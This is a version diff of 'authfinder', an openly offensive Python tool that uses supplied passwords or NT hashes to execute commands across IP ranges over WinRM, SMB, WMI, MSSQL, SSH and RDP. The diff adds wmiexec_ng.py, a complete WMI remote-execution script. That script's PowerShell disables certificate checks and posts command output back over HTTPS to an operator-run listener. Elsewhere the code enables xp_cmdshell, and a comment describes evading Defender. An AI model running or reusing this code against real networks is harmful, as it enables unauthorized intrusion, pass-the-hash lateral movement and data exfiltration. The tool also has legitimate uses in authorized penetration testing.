authfinder 1.1.4__tar.gz → 1.2.0__tar.gz

{authfinder-1.1.4 → authfinder-1.2.0}/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: authfinder
-Version: 1.1.4
+Version: 1.2.0
 Summary: Execute commands across Windows and Linux systems using multiple RCE methods (WinRM, SMB, WMI, RDP, SSH, MSSQL)
 Author: Khael
 Project-URL: Homepage, https://github.com/KhaelK138/authfinder
@@ -74,13 +74,13 @@ gem install evil-winrm
 
 ```bash
 # Execute command on single host
-authfinder 192.168.1.10 administrator Password123 whoami
+authfinder 192.168.1.10 -u administrator -p Password123 -c whoami
 
 # Execute across IP range of 192.168.1.1 to 192.168.1.50
-authfinder 192.168.1.1-50 admin Pass123 "net user"
+authfinder 192.168.1.1-50 -u admin -p Pass123 -c 'net user'
 
 # Use nthash instead of password
-authfinder 10.0.0.1-10 admin :{32-bit-hash} whoami
+authfinder 10.0.0.1-10 -u admin -p :{32-bit-hash} whoami
 ```
 
 ### IP Range Format

{authfinder-1.1.4 → authfinder-1.2.0}/README.md

@@ -46,13 +46,13 @@ gem install evil-winrm
 
 ```bash
 # Execute command on single host
-authfinder 192.168.1.10 administrator Password123 whoami
+authfinder 192.168.1.10 -u administrator -p Password123 -c whoami
 
 # Execute across IP range of 192.168.1.1 to 192.168.1.50
-authfinder 192.168.1.1-50 admin Pass123 "net user"
+authfinder 192.168.1.1-50 -u admin -p Pass123 -c 'net user'
 
 # Use nthash instead of password
-authfinder 10.0.0.1-10 admin :{32-bit-hash} whoami
+authfinder 10.0.0.1-10 -u admin -p :{32-bit-hash} whoami
 ```
 
 ### IP Range Format

{authfinder-1.1.4 → authfinder-1.2.0}/authfinder/__init__.py

@@ -1,3 +1,3 @@
 """authfinder: Execute commands across Windows and Linux systems using multiple RCE methods"""
 
-__version__ = "1.1.4"
+__version__ = "1.2.0"

{authfinder-1.1.4 → authfinder-1.2.0}/authfinder/authfinder.py

@@ -22,7 +22,7 @@ TOOLS_SPECIFIED = False
 LINUX_MODE = False
 
 VALID_TOOLS = ["winrm", "smbexec", "wmi", "ssh", "mssql", "psexec", "atexec", "rdp"]
-NXC_TOOLS = {"smbexec", "wmi", "ssh", "rdp"}
+NXC_TOOLS = {"smbexec", "ssh", "rdp"}
 
 IMPACKET_PREFIX = "impacket-"  # or "" for .py suffix
 NXC_CMD = "nxc"
@@ -73,7 +73,8 @@ def parse_ip_range(ip_range):
             for d in expanded[3]]
 
 def is_nthash(credential):
-    cred = credential.lstrip(':').replace("'", "")
+    """Check if a credential is an NT hash (32 hex characters)."""
+    cred = credential.lstrip(':').replace("'", "").strip()
     if len(cred) == 32:
         try:
             int(cred, 16)
@@ -87,13 +88,13 @@ def load_credential_file(path):
     """
     Load credentials from file with newline-separated format:
     <user1>
-    <user1_password>
+    <user1_password_or_hash>
     <user2>
-    <user2_password>
+    <user2_password_or_hash>
     ...
     
     Blank lines and lines starting with # are ignored.
-    For hashes, use the hash directly as the password line.
+    Automatically detects if each credential is a hash or password.
     """
     try:
         with open(path, "r", encoding="utf-8") as f:
@@ -115,7 +116,8 @@ def load_credential_file(path):
     for i in range(0, len(filtered), 2):
         user = filtered[i].strip()
         cred = filtered[i + 1]
-        creds.append((user, cred))
+        is_hash = is_nthash(cred)
+        creds.append((user, cred, is_hash))
     
     return creds
 
@@ -183,9 +185,8 @@ def scan_ports_for_tools(ip, tool_list):
     
     return viable_tools, open_ports
 
-def build_cmd(tool, user, target, credential, command):
+def build_cmd(tool, user, target, credential, command, use_hash=False):
     b64 = base64.b64encode(command.encode("utf-16le")).decode()
-    use_hash = is_nthash(credential)
     hash_val = credential.lstrip(':')
     
     # For nxc tools, add --no-output unless -o was passed
@@ -209,6 +210,13 @@ def build_cmd(tool, user, target, credential, command):
         return (f"{cmd} -hashes :{hash_val} \"{user}\"@{target} 'powershell -enc {b64}'"
                 if use_hash else
                 f"{cmd} \"{user}\":{credential}@{target} 'powershell -enc {b64}'")
+    
+    if tool == "wmi":
+        # Use wmiexec-ng for WMI execution (uses HTTPS callback for output retrieval)
+        output_flag = " -o" if OUTPUT else ""
+        return (f"wmiexec-ng {target} -u \"{user}\" -H {hash_val} -x 'powershell -enc {b64}'{output_flag}"
+                if use_hash else
+                f"wmiexec-ng {target} -u \"{user}\" -p {credential} -x 'powershell -enc {b64}'{output_flag}")
 
     # winrm handling - both regular and SSL variants
     # yes I know nxc has a winrm module which can oneshot commands, but evil-winrm has proved itself more dependable
@@ -228,13 +236,6 @@ def build_cmd(tool, user, target, credential, command):
                 if use_hash else
                 f"{NXC_CMD} smb {target} -p {credential} -u \"{user}\" -X 'powershell -enc {b64}' --exec-method smbexec{nxc_output_flag}")
 
-    if tool == "wmi":
-        # we don't actually need to pass the --no-output here, as defender won't catch it with this specific `cmd /c "powershell -enc` combo
-        # additionally, adding --no-output makes it very difficult to differentiate between command execution and a successful authentication w/o execution for wmi specifically
-        return (f"{NXC_CMD} wmi {target} -H {hash_val} -u \"{user}\" -X 'cmd /c \"powershell -enc {b64}\"'"
-                if use_hash else
-                f"{NXC_CMD} wmi {target} -p {credential} -u \"{user}\" -X 'cmd /c \"powershell -enc {b64}\"'")
-
     if tool == "ssh":
         if LINUX_MODE:
             b64 = base64.b64encode(command.encode("utf-8")).decode()
@@ -248,7 +249,7 @@ def build_cmd(tool, user, target, credential, command):
 
     raise Exception(f"Unknown tool: {tool}")
 
-def run_chain(user, ip, credential, command, tool_list=None):
+def run_chain(user, ip, credential, command, use_hash=False, tool_list=None):
     chain = tool_list if tool_list else VALID_TOOLS
 
     # test both winrm types
@@ -263,7 +264,7 @@ def run_chain(user, ip, credential, command, tool_list=None):
 
     for tool in chain:
         # Can't pass the hash with SSH
-        if tool == "ssh" and is_nthash(credential):
+        if tool == "ssh" and use_hash:
             safe_print(f"  [-] Skipping SSH for {ip}: cannot pass the hash.")
             continue
 
@@ -274,7 +275,7 @@ def run_chain(user, ip, credential, command, tool_list=None):
         if tool == "mssql":
             safe_print(f"[*] Attempting to enable xp_cmdshell on {ip}...")
 
-        cmd = build_cmd(tool, user, ip, credential, command)
+        cmd = build_cmd(tool, user, ip, credential, command, use_hash)
         safe_print(f"[*] Trying {tool}: {cmd}")
 
         try:
@@ -364,7 +365,7 @@ def run_chain(user, ip, credential, command, tool_list=None):
 
     return None
 
-def execute_on_ip(username, ip, credential, command, tool_list=None):
+def execute_on_ip(username, ip, credential, command, use_hash=False, tool_list=None):
     
     if SKIP_PORTSCAN:
         safe_print(f"[*] Skipping portscan for {ip} (--skip-portscan enabled)")
@@ -384,7 +385,7 @@ def execute_on_ip(username, ip, credential, command, tool_list=None):
         display_tools = list(dict.fromkeys(display_tools))  
         safe_print(f"    \033[34m[i]\033[0m Viable tools found for {ip} based on portscan: {', '.join(display_tools)}")
     
-    result = run_chain(username, ip, credential, command, viable_tools)
+    result = run_chain(username, ip, credential, command, use_hash, viable_tools)
 
     if RUN_ALL:
         safe_print(f"[*] All tools successfully run for {ip} with {username}.")
@@ -406,32 +407,38 @@ def parse_args():
     parser = argparse.ArgumentParser(
         description="Execute commands across an IP range using multiple Windows RCE methods",
         formatter_class=argparse.RawTextHelpFormatter,
-        usage="%(prog)s ip_range username credential command [-h] [-v] [-o] [--threads NUM_THREADS] [--timeout TIMEOUT_SECONDS] [--tools LIST] [--run-all] [--skip-portscan] [-f CRED_FILE]"
+        usage="%(prog)s ip_range -u USER -p PASS [-c PSCMD] [-h] [-v] [-o] [--threads NUM_THREADS] [--timeout SECONDS] [--tools LIST] [--run-all] [--skip-portscan]\n       %(prog)s ip_range -u USER -H HASH [-c PSCMD] [...]\n       %(prog)s ip_range -f CRED_FILE [-c PSCMD] [...]"
     )
 
     parser.add_argument("-v", action="store_true", help="Verbose output")
     parser.add_argument("-o", action="store_true", help="Show successful command output")
-    parser.add_argument("--threads", metavar="NUM_THREADS", type=int, default=10, help="Number of concurrent threads")
+    parser.add_argument("--threads", metavar="NUM_THREADS", type=int, default=None, help="Number of concurrent threads (default: 10, or fewer if less tasks)")
     parser.add_argument("--timeout", metavar="TIMEOUT_SECONDS", type=int, default=15, help="Number of seconds before commands timeout")
     parser.add_argument("--tools", metavar="LIST", help="Comma-separated list of tools to try")
     parser.add_argument("--run-all", action="store_true", help="Run all tools, often running the desired command multiple times")
     parser.add_argument("--skip-portscan", action="store_true", help="Skip port scanning and attempt all tools")
-    parser.add_argument("-f", "--file", metavar="CRED_FILE", help="Credential file (newline-separated user/password pairs)")
+    parser.add_argument("-f", "--file", metavar="CRED_FILE", help="Credential file (newline-separated user/password or user/hash pairs; hashes auto-detected)")
 
     parser.add_argument("--linux", action="store_true", help="Linux-only mode - automates SSH, ignores other tools")
 
     parser.add_argument("ip_range", help="IP range (e.g., 192.168.1.1-254)")
-    parser.add_argument("username", nargs="?", help="Username")
-    parser.add_argument("credential", nargs="?", help="Password or NT hash")
-    parser.add_argument("command", nargs="*", help="Command to run (default: whoami)")
+    parser.add_argument("-u", "--user", metavar="USERNAME", help="Username")
+    parser.add_argument("-p", "--password", metavar="PASSWORD", help="Password")
+    parser.add_argument("-H", "--hash", metavar="HASH", help="NT hash")
+    parser.add_argument("-c", "--command", metavar="PSCMD", help="Powershell command to run (default: whoami)")
 
     args = parser.parse_args()
 
-    if args.file and (args.username or args.credential):
-        parser.error("Cannot specify username/password when using -f")
+    if args.file and (args.user or args.password or args.hash):
+        parser.error("Cannot specify -u/-p/-H when using -f")
 
-    if not args.file and (not args.username or not args.credential):
-        parser.error("Must supply either -f FILE or username and credential")
+    if not args.file:
+        if not args.user:
+            parser.error("Must supply either -f FILE or -u USER")
+        if not args.password and not args.hash:
+            parser.error("Must supply either -p PASSWORD or -H HASH with -u USER")
+        if args.password and args.hash:
+            parser.error("Cannot specify both -p and -H")
 
     return args
 
@@ -441,6 +448,8 @@ def check_dependencies():
     """Check if required tools are installed."""
     global IMPACKET_PREFIX, NXC_CMD, WINRM_CMD
 
+    missing_tools = []
+
     # Check impacket (either impacket-psexec or psexec.py)
     r1 = shutil.which("impacket-psexec")
     r2 = shutil.which("psexec.py")
@@ -448,9 +457,8 @@ def check_dependencies():
         IMPACKET_PREFIX = "impacket-"
     elif r2:
         IMPACKET_PREFIX = ""
-    elif not LINUX_MODE:
-        print("[-] impacket not found. Install with: pipx install impacket")
-        sys.exit(1)
+    else:
+        missing_tools.append("impacket")
     
     # Check nxc/crackmapexec
     r1 = shutil.which("nxc")
@@ -463,20 +471,27 @@ def check_dependencies():
     elif r3:
         NXC_CMD = "crackmapexec"
     else:
-        print("[-] netexec not found. Install with: pipx install git+https://github.com/Pennyw0rth/NetExec")
-        sys.exit(1)
+        missing_tools.append("nxc")
 
     # Check evil-winrm
     if shutil.which("evil-winrm"):
         WINRM_CMD = "evil-winrm"
-    else:
+    elif os.path.isdir("/usr/local/rvm/gems"):
         # default in exegol
-        base = "/usr/local/rvm/gems"
-        for d in os.listdir(base):
+        for d in os.listdir("/usr/local/rvm/gems"):
             if d.endswith("@evil-winrm"):
-                WINRM_CMD = f"{base}/{d}/wrappers/evil-winrm"
-    if not WINRM_CMD and not LINUX_MODE:
-        print("[-] evil-winrm not found. Please install with gem install evil-winrm")
+                WINRM_CMD = f"/usr/local/rvm/gems/{d}/wrappers/evil-winrm"
+    else:
+        missing_tools.append("evil-winrm")
+
+    if not missing_tools == []:
+        for tool in missing_tools:
+            if tool == "nxc":
+                print("[-] netexec not found. Install with: pipx install git+https://github.com/Pennyw0rth/NetExec")
+            if tool == "impacket" and not LINUX_MODE:
+                print("[-] impacket not found. Install with: pipx install impacket")
+            if tool == "evil-winrm" and not LINUX_MODE:
+                print("[-] evil-winrm not found. Please install with gem install evil-winrm")    
         sys.exit(1)
     
 def impacket_cmd(tool):
@@ -488,22 +503,26 @@ def impacket_cmd(tool):
 def main():
     global VERBOSE, OUTPUT, MAX_THREADS, EXEC_TIMEOUT, RUN_ALL, SKIP_PORTSCAN, TOOLS_SPECIFIED, LINUX_MODE
 
-    check_dependencies()
-
     args = parse_args()
 
     VERBOSE = args.v
     OUTPUT = args.o
-    MAX_THREADS = args.threads if args.threads > 0 else 1
     EXEC_TIMEOUT = args.timeout
     RUN_ALL = args.run_all
     SKIP_PORTSCAN = args.skip_portscan
     LINUX_MODE = args.linux
 
+    check_dependencies()
+
+    # Determine credentials
     if args.file:
+        # Auto-detect hashes in credential file
         credential_list = load_credential_file(args.file)
     else:
-        credential_list = [(args.username, args.credential)]
+        if args.hash:
+            credential_list = [(args.user, args.hash, True)]
+        else:
+            credential_list = [(args.user, args.password, False)]
 
     if args.ip_range.endswith('.txt'):
         ips = []
@@ -515,8 +534,10 @@ def main():
     else:
         ips = parse_ip_range(args.ip_range)
 
-    if len(ips) < MAX_THREADS and not args.threads:
-        MAX_THREADS = len(ips)
+    if args.threads is not None:
+        MAX_THREADS = max(args.threads, 1)
+    else:
+        MAX_THREADS = min(10, len(ips))
 
     print(f"[*] Loaded {len(credential_list)} credential set(s)")
     print(f"[*] Processing {len(ips)} IPs with {MAX_THREADS} threads...")
@@ -536,7 +557,7 @@ def main():
     if args.skip_portscan:
         print("\033[33m[!] Port scanning disabled (--skip-portscan). All tools will be attempted.\033[0m")
 
-    command = " ".join(args.command) if args.command else "whoami"
+    command = args.command if args.command else "whoami"
     
     if not OUTPUT:
         print("\033[33m[!] Output Disabled. Run with -o to see successful command output\033[0m")
@@ -548,10 +569,10 @@ def main():
     futures = []
     with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
         for ip in ips:
-            for (user, cred) in credential_list:
+            for (user, cred, is_hash) in credential_list:
                 cred = shlex.quote(cred)
                 futures.append(
-                    executor.submit(execute_on_ip, user, ip, cred, command, tool_list)
+                    executor.submit(execute_on_ip, user, ip, cred, command, is_hash, tool_list)
                 )
 
         for future in as_completed(futures):

authfinder-1.2.0/authfinder/wmiexec_ng.py

@@ -0,0 +1,319 @@
+#!/usr/bin/env python3
+"""
+WMI process execution with HTTPS-based output retrieval.
+Requires: pip install impacket
+"""
+
+import sys
+import os
+import ssl
+import uuid
+import socket
+import random
+import argparse
+import tempfile
+import threading
+import subprocess
+from http.server import HTTPServer, BaseHTTPRequestHandler
+from impacket.dcerpc.v5.dcom import wmi
+from impacket.dcerpc.v5.dcomrt import DCOMConnection
+from impacket.dcerpc.v5.dtypes import NULL
+
+
+# Globals for server coordination
+output_received = threading.Event()
+output_data = b""
+verbose = False
+
+
+def log(msg: str):
+    """Print message only if verbose mode is enabled."""
+    if verbose:
+        print(msg)
+
+
+def get_local_ip(target: str) -> str:
+    """Get the local IP address used to reach a target."""
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        s.connect((target, 80))
+        local_ip = s.getsockname()[0]
+        s.close()
+        return local_ip
+    except Exception:
+        return "127.0.0.1"
+
+
+def find_available_port(start: int = 10000, end: int = 30000) -> int:
+    """Find an available port in the given range, retrying every second."""
+    while True:
+        port = random.randint(start, end)
+        try:
+            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+            s.bind(("0.0.0.0", port))
+            s.close()
+            log(f"[*] Found available port: {port}")
+            return port
+        except OSError:
+            log(f"[*] Port {port} unavailable, retrying...")
+            import time
+            time.sleep(1)
+
+
+def generate_ssl_cert(cert_file: str, key_file: str):
+    """Generate a self-signed SSL certificate using openssl."""
+    log("[*] Generating SSL certificate...")
+    cmd = [
+        "openssl", "req", "-x509", "-newkey", "rsa:2048",
+        "-keyout", key_file,
+        "-out", cert_file,
+        "-days", "1", "-nodes",
+        "-subj", "/CN=localhost"
+    ]
+    try:
+        subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+        log("[*] SSL certificate generated")
+    except subprocess.CalledProcessError:
+        print("[!] Failed to generate SSL certificate (is openssl installed?)")
+        sys.exit(1)
+
+
+class OutputHandler(BaseHTTPRequestHandler):
+    """HTTP handler for receiving command output via POST."""
+
+    def do_POST(self):
+        global output_data
+        try:
+            content_length = int(self.headers.get("Content-Length", 0))
+            output_data = self.rfile.read(content_length)
+            self.send_response(200)
+            self.end_headers()
+            self.wfile.write(b"OK")
+            output_received.set()
+        except Exception as e:
+            log(f"[!] Error receiving output: {e}")
+            self.send_response(500)
+            self.end_headers()
+
+    def log_message(self, format, *args):
+        if verbose:
+            super().log_message(format, *args)
+
+
+def start_https_server(port: int, cert_file: str, key_file: str) -> HTTPServer:
+    """Start HTTPS server for receiving output."""
+    server = HTTPServer(("0.0.0.0", port), OutputHandler)
+    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+    context.load_cert_chain(cert_file, key_file)
+    server.socket = context.wrap_socket(server.socket, server_side=True)
+    return server
+
+
+def build_powershell_command(command: str, output_file: str, server_url: str) -> str:
+    """Build the PowerShell script that executes command and uploads output."""
+    import base64
+
+    # Base64 encode the user's command (UTF-16LE for PowerShell -enc)
+    user_cmd_encoded = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
+
+    # PowerShell script with TLS cert bypass
+    # Executes user command via -enc, captures output, uploads via HTTPS
+    ps_script = f'''
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+Add-Type @"
+using System.Net;
+using System.Security.Cryptography.X509Certificates;
+public class TrustAllCertsPolicy : ICertificatePolicy {{
+    public bool CheckValidationResult(
+        ServicePoint srvPoint, X509Certificate certificate,
+        WebRequest request, int certificateProblem) {{
+        return true;
+    }}
+}}
+"@
+[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
+
+powershell.exe -enc {user_cmd_encoded} | Out-File -FilePath "{output_file}" -Encoding UTF8
+$bytes = [System.IO.File]::ReadAllBytes("{output_file}")
+Invoke-WebRequest -Uri "{server_url}" -Method POST -Body $bytes -UseBasicParsing | Out-Null
+Remove-Item -Path "{output_file}" -Force
+'''
+    # Encode wrapper script as base64 for safe transport
+    encoded = base64.b64encode(ps_script.encode("utf-16-le")).decode("ascii")
+    return f'powershell.exe -EncodedCommand {encoded}'
+
+
+def wmi_exec(target: str, username: str, password: str, command: str,
+             domain: str = "", hashes: str = "", get_output: bool = False,
+             timeout: int = 30) -> str | None:
+    """
+    Execute a command via WMI.
+
+    Args:
+        target: Target IP or hostname
+        username: Username for authentication
+        password: Password for authentication
+        command: Command to execute
+        domain: Domain (optional)
+        hashes: NTLM hashes in LMHASH:NTHASH format (optional, for pass-the-hash)
+        get_output: Whether to retrieve command output via HTTPS
+        timeout: Timeout in seconds for output retrieval
+
+    Returns:
+        Command output if get_output=True, None otherwise
+    """
+    global output_data, output_received
+
+    # Parse hashes if provided
+    lmhash = ""
+    nthash = ""
+    if hashes:
+        if ":" in hashes:
+            lmhash, nthash = hashes.split(":", 1)
+        else:
+            # Assume it's just the NT hash
+            nthash = hashes
+
+    # Reset globals
+    output_data = b""
+    output_received.clear()
+
+    server = None
+    server_thread = None
+    temp_dir = None
+
+    try:
+        if get_output:
+            # Setup HTTPS server for output retrieval
+            temp_dir = tempfile.mkdtemp()
+            cert_file = os.path.join(temp_dir, "cert.pem")
+            key_file = os.path.join(temp_dir, "key.pem")
+
+            generate_ssl_cert(cert_file, key_file)
+
+            port = find_available_port()
+            local_ip = get_local_ip(target)
+            server_url = f"https://{local_ip}:{port}/"
+
+            log(f"[*] Starting HTTPS server on {local_ip}:{port}")
+            server = start_https_server(port, cert_file, key_file)
+
+            # Run server in background thread
+            server_thread = threading.Thread(target=server.handle_request, daemon=True)
+            server_thread.start()
+
+            # Build PowerShell command with output upload
+            output_file = f"C:\\Windows\\Temp\\{uuid.uuid4()}.txt"
+            full_command = build_powershell_command(command, output_file, server_url)
+            log(f"[*] Output will be uploaded to {server_url}")
+        else:
+            full_command = command
+
+        # Connect via DCOM
+        log(f"[*] Connecting to {target}...")
+        dcom = DCOMConnection(target, username, password, domain, lmhash, nthash)
+
+        try:
+            # Get WMI interface
+            iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
+            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
+
+            # Login to namespace
+            iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
+            iWbemLevel1Login.RemRelease()
+
+            # Get Win32_Process class
+            win32_process, _ = iWbemServices.GetObject("Win32_Process")
+
+            # Call Create method
+            log(f"[*] Executing command...")
+            win32_process.Create(full_command, "C:\\", None)
+
+            if not get_output:
+                print(f"[+] Executed: {command}")
+                return None
+
+        finally:
+            dcom.disconnect()
+
+        # Wait for output
+        if get_output:
+            log(f"[*] Waiting for output (timeout: {timeout}s)...")
+            if output_received.wait(timeout=timeout):
+                result = output_data.decode("utf-8", errors="replace")
+                # Strip BOM and whitespace
+                result = result.lstrip("\ufeff").strip()
+                print(result)
+                return result
+            else:
+                print("[!] Timeout waiting for output")
+                return None
+
+    finally:
+        # Cleanup
+        if server:
+            server.server_close()
+        if temp_dir:
+            import shutil
+            shutil.rmtree(temp_dir, ignore_errors=True)
+
+
+def main():
+    global verbose
+
+    parser = argparse.ArgumentParser(
+        description="WMI remote command execution with optional output retrieval",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Examples:
+  # Execute with password
+  %(prog)s 192.168.1.10 -u Administrator -p 'password' -x 'whoami' -o
+
+  # Pass-the-hash
+  %(prog)s 192.168.1.10 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -x 'whoami' -o
+
+  # Blank password (if neither -p nor -H supplied)
+  %(prog)s 192.168.1.10 -u Administrator -x 'whoami' -o
+
+  # With domain
+  %(prog)s 192.168.1.10 -u Administrator -p 'password' -d MYDOMAIN -x 'whoami' -o
+"""
+    )
+
+    parser.add_argument("target", help="Target IP or hostname")
+    parser.add_argument("-u", "--username", required=True, help="Username")
+    parser.add_argument("-p", "--password", default="", help="Password")
+    parser.add_argument("-H", "--hashes", metavar="[LMHASH:]NTHASH",
+                        help="NTLM hashes for pass-the-hash")
+    parser.add_argument("-d", "--domain", default="", help="Domain")
+    parser.add_argument("-x", "--execute", required=True, metavar="CMD",
+                        help="Command to execute")
+    parser.add_argument("-o", "--output", action="store_true",
+                        help="Retrieve command output via HTTPS callback")
+    parser.add_argument("-t", "--timeout", type=int, default=30,
+                        help="Timeout for output retrieval (default: 30s)")
+    parser.add_argument("-v", "--verbose", action="store_true",
+                        help="Show verbose output (HTTPS server activity, etc.)")
+
+    args = parser.parse_args()
+    verbose = args.verbose
+
+    # Use blank password if neither -p nor -H supplied
+    password = args.password
+    hashes = args.hashes or ""
+
+    wmi_exec(
+        target=args.target,
+        username=args.username,
+        password=password,
+        command=args.execute,
+        domain=args.domain,
+        hashes=hashes,
+        get_output=args.output,
+        timeout=args.timeout
+    )
+
+
+if __name__ == "__main__":
+    main()

{authfinder-1.1.4 → authfinder-1.2.0}/authfinder.egg-info/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: authfinder
-Version: 1.1.4
+Version: 1.2.0
 Summary: Execute commands across Windows and Linux systems using multiple RCE methods (WinRM, SMB, WMI, RDP, SSH, MSSQL)
 Author: Khael
 Project-URL: Homepage, https://github.com/KhaelK138/authfinder
@@ -74,13 +74,13 @@ gem install evil-winrm
 
 ```bash
 # Execute command on single host
-authfinder 192.168.1.10 administrator Password123 whoami
+authfinder 192.168.1.10 -u administrator -p Password123 -c whoami
 
 # Execute across IP range of 192.168.1.1 to 192.168.1.50
-authfinder 192.168.1.1-50 admin Pass123 "net user"
+authfinder 192.168.1.1-50 -u admin -p Pass123 -c 'net user'
 
 # Use nthash instead of password
-authfinder 10.0.0.1-10 admin :{32-bit-hash} whoami
+authfinder 10.0.0.1-10 -u admin -p :{32-bit-hash} whoami
 ```
 
 ### IP Range Format

{authfinder-1.1.4 → authfinder-1.2.0}/authfinder.egg-info/SOURCES.txt

@@ -3,6 +3,7 @@ README.md
 pyproject.toml
 authfinder/__init__.py
 authfinder/authfinder.py
+authfinder/wmiexec_ng.py
 authfinder.egg-info/PKG-INFO
 authfinder.egg-info/SOURCES.txt
 authfinder.egg-info/dependency_links.txt

{authfinder-1.1.4 → authfinder-1.2.0}/authfinder.egg-info/entry_points.txt

@@ -1,2 +1,3 @@
 [console_scripts]
 authfinder = authfinder.authfinder:main
+wmiexec-ng = authfinder.wmiexec_ng:main

{authfinder-1.1.4 → authfinder-1.2.0}/pyproject.toml

@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "authfinder"
-version = "1.1.4"
+version = "1.2.0"
 description = "Execute commands across Windows and Linux systems using multiple RCE methods (WinRM, SMB, WMI, RDP, SSH, MSSQL)"
 readme = "README.md"
 authors = [
@@ -35,6 +35,7 @@ dev = [
 
 [project.scripts]
 authfinder = "authfinder.authfinder:main"
+wmiexec-ng = "authfinder.wmiexec_ng:main"
 
 [project.urls]
 Homepage = "https://github.com/KhaelK138/authfinder"